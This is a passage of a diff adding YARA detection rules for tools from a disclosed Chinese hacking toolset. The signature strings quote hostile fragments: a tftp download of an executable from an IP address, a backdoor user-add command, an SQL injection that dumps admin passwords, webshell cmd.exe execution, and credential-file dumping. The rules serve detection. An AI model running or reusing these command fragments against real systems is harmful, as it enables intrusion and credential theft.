+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".Open \"POST\",PostUrl,False" fullword ascii
+      $s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
+   condition: 
+      filesize < 9KB and all of them
+}
+
+rule CN_Honker_portRecall_pr_RID3020 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file pr"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:26:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage: Same as lcx.exe in win32 :)" fullword ascii
+      $s2 = "connect to client" fullword ascii
+      $s3 = "PR(Packet redirection) for linux " fullword ascii
+   condition: 
+      filesize < 70KB and all of them
+}
+
+rule CN_Honker_sig_3389_3389_3_RID2F08 : CHINA DEMO SCRIPT SUSP T1050 {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:39:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP, T1050"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "echo \"fDenyTSConnections\"=dword:00000000>>3389.reg " fullword ascii
+      $s2 = "echo \"PortNumber\"=dword:00000d3d>>3389.reg " fullword ascii
+      $s3 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]>>" ascii
+   condition: 
+      filesize < 2KB and all of them
+}
+
+rule CN_Honker_Alien_D_RID2D53 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file D.ASP"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:27:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Paths_str=\"c:\\windows\\\"&chr(13)&chr(10)&\"c:\\Documents and Settings\\\"&chr" ascii
+      $s1 = "CONST_FSO=\"Script\"&\"ing.Fil\"&\"eSyst\"&\"emObject\"" fullword ascii
+      $s2 = "Response.Write \"<form id='form1' name='form1' method='post' action=''>\"" fullword ascii
+      $s3 = "set getAtt=FSO.GetFile(filepath)" fullword ascii
+      $s4 = "Response.Write \"<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' chec" ascii
+   condition: 
+      filesize < 30KB and 2 of them
+}
+
+rule CN_Honker_ChinaChopper_db_RID30A0 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file db.mdb"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:47:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "http://www.maicaidao.com/server.phpcaidao" fullword wide
+      $s2 = "<O>act=login</O>" fullword wide
+      $s3 = "<H>localhost</H>" fullword wide
+   condition: 
+      filesize < 340KB and 2 of them
+}
+
+rule CN_Honker_syconfig_RID2E29 : CHINA DEMO FILE SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file syconfig.dll"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:02:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "Hashq.CrackHost+FormUnit" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x0100 and filesize < 18KB and all of them
+}
+
+rule CN_Honker_linux_bin_RID2E8F : CHINA DEMO LINUX SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file linux_bin"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:19:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, LINUX, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "client.sin_port = htons(atoi(argv[3]));" fullword ascii
+      $s2 = "printf(\"\\n\\n*********Waiting Client connect*****\\n\\n\");" fullword ascii
+   condition: 
+      filesize < 20KB and all of them
+}
+
+rule CN_Honker_Intersect2_Beta_RID3085 : CHINA DEMO FILE SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file Intersect2-Beta.py"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:43:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "os.system(\"ls -alhR /home > AllUsers.txt\")" fullword ascii
+      $s2 = "os.system('getent passwd > passwd.txt')" fullword ascii
+      $s3 = "os.system(\"rm -rf credentials/\")" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x2123 and filesize < 50KB and 2 of them
+}
+
+rule CN_Honker_IIS_logcleaner1_0_readme_RID33B4 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file readme.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:59:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "LogCleaner.exe <ip> [Logpath]" fullword ascii
+      $s3 = "http://l-y.vicp.net" fullword ascii
+   condition: 
+      filesize < 7KB and all of them
+}
+
+rule CN_Honker_Alien_command_RID2FEE : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file command.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:18:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "for /d %i in (E:\\freehost\\*) do @echo %i" fullword ascii
+      $s1 = "/c \"C:\\windows\\temp\\cscript\" C:\\windows\\temp\\iis.vbs" fullword ascii
+   condition: 
+      filesize < 8KB and all of them
+}
+
+rule CN_Honker_portRecall_bc_RID3003 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file bc.pl"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:21:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "print \"[*] Connected to remote host \\n\"; " fullword ascii
+      $s1 = "print \"Usage: $0 [Host] [Port] \\n\\n\";  " fullword ascii
+      $s5 = "print \"[*] Resolving HostName\\n\"; " fullword ascii
+   condition: 
+      filesize < 10KB and all of them
+}
+
+rule CN_Honker_Tuoku_script_MSSQL__RID3221 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file MSSQL_.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:52:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GetLoginCookie = Request.Cookies(Cookie_Login)" fullword ascii
+      $s2 = "if ShellPath=\"\" Then ShellPath = \"c:\\\\windows\\\\system32\\\\cmd.exe\"" fullword ascii
+      $s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
+   condition: 
+      filesize < 100KB and all of them
+}
+
+rule CN_Honker_nc_MOVE_RID2D2E : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file MOVE.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:20:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Destination: http://202.113.20.235/gj/images/2.asp" fullword ascii
+      $s1 = "HOST: 202.113.20.235" fullword ascii
+      $s2 = "MOVE /gj/images/A.txt HTTP/1.1" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule CN_Honker_mssqlpw_scan_RID2FE2 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file mssqlpw scan.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:16:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "response.Write(\"I Get it ! Password is <font color=red>\" & str & \"</font><BR>" ascii
+      $s1 = "response.Write \"Done!<br>Process \" & tTime & \" s\"" fullword ascii
+   condition: 
+      filesize < 6KB and all of them
+}
+
+rule CN_Honker_MAC_IPMAC_RID2D61 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:29:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Http://Www.YrYz.Net" fullword wide
+      $s2 = "IpMac.txt" fullword ascii
+      $s3 = "192.168.0.1" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 267KB and all of them
+}
+
+rule CN_Honker_GetSyskey_RID2E6F : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:14:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii
+      $s4 = "The system key file \"%s\" is created." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 40KB and all of them
+}
+
+rule CN_Honker_Churrasco_RID2E71 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:14:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "HEAD9 /" ascii
+      $s1 = "logic_er" fullword ascii
+      $s6 = "proggam" fullword ascii
+      $s16 = "DtcGetTransactionManagerExA" fullword ascii
+      $s17 = "GetUserNameA" fullword ascii
+      $s18 = "OLEAUT" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1276KB and all of them
+}
+
+rule CN_Honker_mysql_injectV1_1_Creak_RID3335 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file mysql_injectV1.1_Creak.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:38:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "1http://192.169.200.200:2217/mysql_inject.php?id=1" fullword ascii
+      $s12 = "OnGetPassword" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5890KB and all of them
+}
+
+rule CN_Honker_ASP_wshell_RID2E99 : CHINA DEMO FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:21:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
+      $s1 = "UserPass=" 
+      $s2 = "VerName=" 
+      $s3 = "StateName=" 
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 200KB and all of them
+}
+
+rule CN_Honker_exp_iis7_RID2DEF : CHINA DEMO EXE EXPLOIT FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file iis7.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:53:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\\\localhost" fullword ascii
+      $s1 = "iis.run" fullword ascii
+      $s3 = ">Could not connecto %s" fullword ascii
+      $s4 = "WinSta0\\Default" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and all of them
+}
+
+rule CN_Honker_SegmentWeapon_RID3004 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file SegmentWeapon.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:21:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "C:\\WINDOWS\\system32\\msvbvm60.dll\\3" fullword ascii
+      $s1 = "http://www.nforange.com/inc/1.asp?" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule CN_Honker_Alien_iispwd_RID2F9F : CHINA DEMO HKTL SCRIPT {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:05:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii
+      $s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii
+   condition: 
+      filesize < 3KB and all of them
+}
+
+rule CN_Honker_Md5CrackTools_RID2FA2 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:05:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+      $s2 = ",<a href='index.php?c=1&type=md5&hash=" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 4580KB and all of them
+}
+
+rule CN_Honker_CoolScan_scan_RID2FDD : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file scan.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:15:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii
+      $s1 = "scan web.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3680KB and all of them
+}
+
+rule CN_Honker_COOKIE_CooKie_RID2F1A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:42:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii
+      $s5 = "CooKie.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 360KB and all of them
+}
+
+rule CN_Honker_wwwscan_1_wwwscan_RID31CA : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:37:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
+      $s3 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 180KB and all of them
+}
+
+rule CN_Honker_D_injection_V2_32_RID30D8 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:57:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide
+      $s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+}
+
+rule CN_Honker_net_priv_esc2_RID2FFA : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file net-priv-esc2.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:20:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage:%s username password" fullword ascii
+      $s2 = "<www.darkst.com>" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 17KB and all of them
+}
+
+rule CN_Honker_Oracle_v1_0_Oracle_RID3167 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:21:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "!http://localhost/index.asp?id=zhr" fullword ascii
+      $s2 = "OnGetPassword" fullword ascii
+      $s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3455KB and all of them
+}
+
+rule CN_Honker_Interception_RID2FBB : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:09:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = ".\\dat\\Hookmsgina.dll" fullword ascii
+      $s5 = "WinlogonHackEx " fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 160KB and all of them
+}
+
+rule CN_Honker_sig_3389_DUBrute_v3_0_RC3_3_0_RID3419 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file 3.0.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:16:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "explorer.exe http://bbs.yesmybi.net" fullword ascii
+      $s1 = "LOADER ERROR" fullword ascii
+      $s9 = "CryptGenRandom" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 395KB and all of them
+}
+
+rule CN_Honker_windows_exp_RID2F7E : CHINA DEMO EXE EXPLOIT FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file exp.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:59:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "c:\\windows\\system32\\command.com /c " fullword ascii
+      $s8 = "OH,Sry.Too long command." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 220KB and all of them
+}
+
+rule CN_Honker_safe3wvs_cgiscan_RID3130 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file cgiscan.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:11:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "httpclient.exe" fullword wide
+      $s3 = "www.safe3.com.cn" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 357KB and all of them
+}
+
+rule CN_Honker_pr_debug_RID2E0F : CHINA DEMO EXE FILE HKTL T1087 T1136 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file debug.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:58:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1087, T1136"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "-->Got WMI process Pid: %d " ascii
+      $s2 = "This exploit will execute \"net user temp 123456 /add & net localg" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 820KB and all of them
+}
+
+rule CN_Honker_T00ls_Lpk_Sethc_v4_0_RID31CE : CHINA DEMO EXE FILE HKTL T1015 {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:38:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1015"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "LOADER ERROR" fullword ascii
+      $s15 = "2011-2012 T00LS&RICES" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2077KB and all of them
+}
+
+rule CN_Honker_MatriXay1073_RID2EC1 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:28:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii
+      $s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii
+      $s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" fullword ascii
+      $s3 = "getalluserpasswordhash" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 9100KB and all of them
+}
+
+rule CN_Honker_Havij_Havij_RID2F0A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:40:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "User-Agent: %Inject_Here%" fullword wide
+      $s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+}
+
+rule CN_Honker_exp_ms11011_RID2E47 : CHINA DEMO EXE EXPLOIT FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ms11011.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:07:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, EXPLOIT, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\i386\\Hello.pdb" ascii
+      $s1 = "OS not supported." fullword ascii
+      $s2 = ".Rich5" fullword ascii
+      $s3 = "Not supported." fullword wide
+      $s5 = "cmd.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule CN_Honker_Webshell_RID2DFD : CHINA DEMO EXE FILE HKTL T1100 WEBSHELL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Webshell.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:55:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Windows NT users: Please note that having the WinIce/SoftIce" fullword ascii
+      $s2 = "Do you want to cancel the file download?" fullword ascii
+      $s3 = "Downloading: %s" fullword ascii
+   condition: 
